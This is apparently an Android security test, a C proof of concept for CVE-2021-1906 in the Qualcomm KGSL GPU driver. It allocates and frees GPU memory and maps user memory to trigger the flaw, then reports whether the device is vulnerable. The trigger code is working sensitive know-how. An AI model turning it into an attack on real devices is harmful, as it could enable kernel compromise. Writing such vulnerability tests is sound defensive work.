1 /**
2 * Copyright (C) 2021 The Android Open Source Project
3 *
4 * Licensed under the Apache License, Version 2.0 (the "License");
5 * you may not use this file except in compliance with the License.
6 * You may obtain a copy of the License at
7 *
8 * http://www.apache.org/licenses/LICENSE-2.0
9 *
10 * Unless required by applicable law or agreed to in writing, software
11 * distributed under the License is distributed on an "AS IS" BASIS,
12 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 * See the License for the specific language governing permissions and
14 * limitations under the License.
15 */
16
17 /*
18 * CVE-2021-1906
19 */
20
21 #include <fcntl.h>
22 #include <stdint.h>
23 #include <stdio.h>
24 #include <stdlib.h>
25 #include <sys/ioctl.h>
26 #include <sys/mman.h>
27 #include <sys/wait.h>
28 #include <unistd.h>
29
30 #include "../includes/common.h"
31 #include "msm_kgsl.h"
32
33 static void *code_page_cpu_addr = MAP_FAILED;
34 static unsigned long code_page_gpu_addr = 0;
35
36 #define int64 int64_t
37 #define EXPLOIT_VULN_ADDR 0xdff00000
38
39 unsigned int ctx_id = 0;
40
gpu_mem_alloc_id(int fd,int size,int flags,struct kgsl_gpumem_alloc_id * alloc)41 int gpu_mem_alloc_id(int fd, int size, int flags,
42 struct kgsl_gpumem_alloc_id *alloc) {
43 int ret = -1;
44 alloc->flags = flags;
45 alloc->size = size;
46
47 ret = ioctl(fd, IOCTL_KGSL_GPUMEM_ALLOC_ID, alloc);
48 return ret;
49 }
50
gpu_sharedmem_free(int fd,unsigned long gpu_addr)51 int gpu_sharedmem_free(int fd, unsigned long gpu_addr) {
52 struct kgsl_sharedmem_free addr;
53 int ret = -1;
54 addr.gpuaddr = gpu_addr;
55 ret = ioctl(fd, IOCTL_KGSL_SHAREDMEM_FREE, &addr);
56 return ret;
57 }
58
gpu_mem_alloc(int fd,int size,unsigned int flags)59 unsigned long gpu_mem_alloc(int fd, int size, unsigned int flags) {
60 struct kgsl_gpumem_alloc alloc = {0};
61 alloc.size = size;
62 alloc.flags = flags;
63
64 if (ioctl(fd, IOCTL_KGSL_GPUMEM_ALLOC, &alloc) < 0) {
65 return -1;
66 }
67 return alloc.gpuaddr;
68 }
69
gpu_mem_get_info_from_id(int fd,int id,struct kgsl_gpumem_get_info * info)70 int gpu_mem_get_info_from_id(int fd, int id,
71 struct kgsl_gpumem_get_info *info) {
72 int ret = -1;
73 info->id = id;
74 info->gpuaddr = 0;
75 ret = ioctl(fd, IOCTL_KGSL_GPUMEM_GET_INFO, info);
76 return ret;
77 }
78
kgsl_init()79 int kgsl_init() {
80 int kgsl = open("/dev/kgsl-3d0", O_RDWR | O_LARGEFILE);
81 if (kgsl < 0) {
82 return -1;
83 }
84
85 struct kgsl_drawctxt_create ctxc;
86 ctxc.flags = 0x1010D2;
87 ctxc.drawctxt_id = 0;
88 if (ioctl(kgsl, IOCTL_KGSL_DRAWCTXT_CREATE, &ctxc) < 0) {
89 return -1;
90 }
91 ctx_id = ctxc.drawctxt_id;
92 return kgsl;
93 }
94
gpu_map_user_mem(int fd,uintptr_t addr,size_t size,size_t offset,unsigned int flags,unsigned long * gpu_addr)95 int gpu_map_user_mem(int fd, uintptr_t addr, size_t size, size_t offset,
96 unsigned int flags, unsigned long *gpu_addr) {
97 struct kgsl_map_user_mem user_mem = {0};
98 int result = 0;
99
100 user_mem.fd = -1;
101 user_mem.gpuaddr = 0;
102 user_mem.len = size;
103 user_mem.offset = offset;
104 user_mem.hostptr = addr;
105 user_mem.flags = flags;
106 user_mem.memtype = KGSL_USER_MEM_TYPE_ADDR;
107
108 result = ioctl(fd, IOCTL_KGSL_MAP_USER_MEM, &user_mem);
109 if (gpu_addr) {
110 *gpu_addr = user_mem.gpuaddr;
111 }
112 return result;
113 }
114
create_code_page(int fd,int size,void ** cpu_addr,unsigned long * gpu_addr)115 int create_code_page(int fd, int size, void **cpu_addr,
116 unsigned long *gpu_addr) {
117 struct kgsl_gpumem_alloc_id alloc = {0};
118 struct kgsl_gpumem_get_info info = {0};
119 void *cpu_mapping = MAP_FAILED;
120
121 if (gpu_mem_alloc_id(fd, size,
122 KGSL_MEMFLAGS_USE_CPU_MAP | KGSL_MEMFLAGS_GPUREADONLY |
123 KGSL_MEMTYPE_COMMAND,
124 &alloc) < 0) {
125 return -1;
126 }
127
128 cpu_mapping =
129 mmap(NULL, size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, alloc.id << 12);
130 if (cpu_mapping == MAP_FAILED) {
131 return -1;
132 }
133
134 if (gpu_mem_get_info_from_id(fd, alloc.id, &info) < 0) {
135 return -1;
136 }
137
138 *cpu_addr = cpu_mapping;
139 *gpu_addr = info.gpuaddr;
140 return 0;
141 }
142
trigger(int fd,uintptr_t start,uintptr_t end)143 void trigger(int fd, uintptr_t start, uintptr_t end) {
144 void *hostptr = mmap((void *)start, 2 * PAGE_SIZE, PROT_READ | PROT_WRITE,
145 MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);
146 mprotect((void *)((uintptr_t)hostptr + PAGE_SIZE), PAGE_SIZE, PROT_NONE);
147
148 gpu_map_user_mem(fd, (uintptr_t)hostptr, end - start, 0,
149 KGSL_MEMFLAGS_USE_CPU_MAP, NULL);
150 munmap(hostptr, 2 * PAGE_SIZE);
151 }
152
main(void)153 int main(void) {
154 int kgsl_fd = kgsl_init();
155 unsigned long gpu_addr = 0;
156 unsigned long next_gpu_addr = 0;
157
158 FAIL_CHECK(!(kgsl_fd < 0));
159
160 if (create_code_page(kgsl_fd, 4 * PAGE_SIZE, &code_page_cpu_addr,
161 &code_page_gpu_addr) < 0) {
162 close(kgsl_fd);
163 return EXIT_FAILURE;
164 }
165
166 next_gpu_addr = gpu_mem_alloc(kgsl_fd, PAGE_SIZE, 0);
167 gpu_sharedmem_free(kgsl_fd, next_gpu_addr);
168 trigger(kgsl_fd, next_gpu_addr, EXPLOIT_VULN_ADDR);
169 gpu_addr = gpu_mem_alloc(kgsl_fd, 0x600000, 0);
170
171 close(kgsl_fd);
172 return (gpu_addr == EXPLOIT_VULN_ADDR) ? EXIT_VULNERABLE : EXIT_SUCCESS;
173 }
174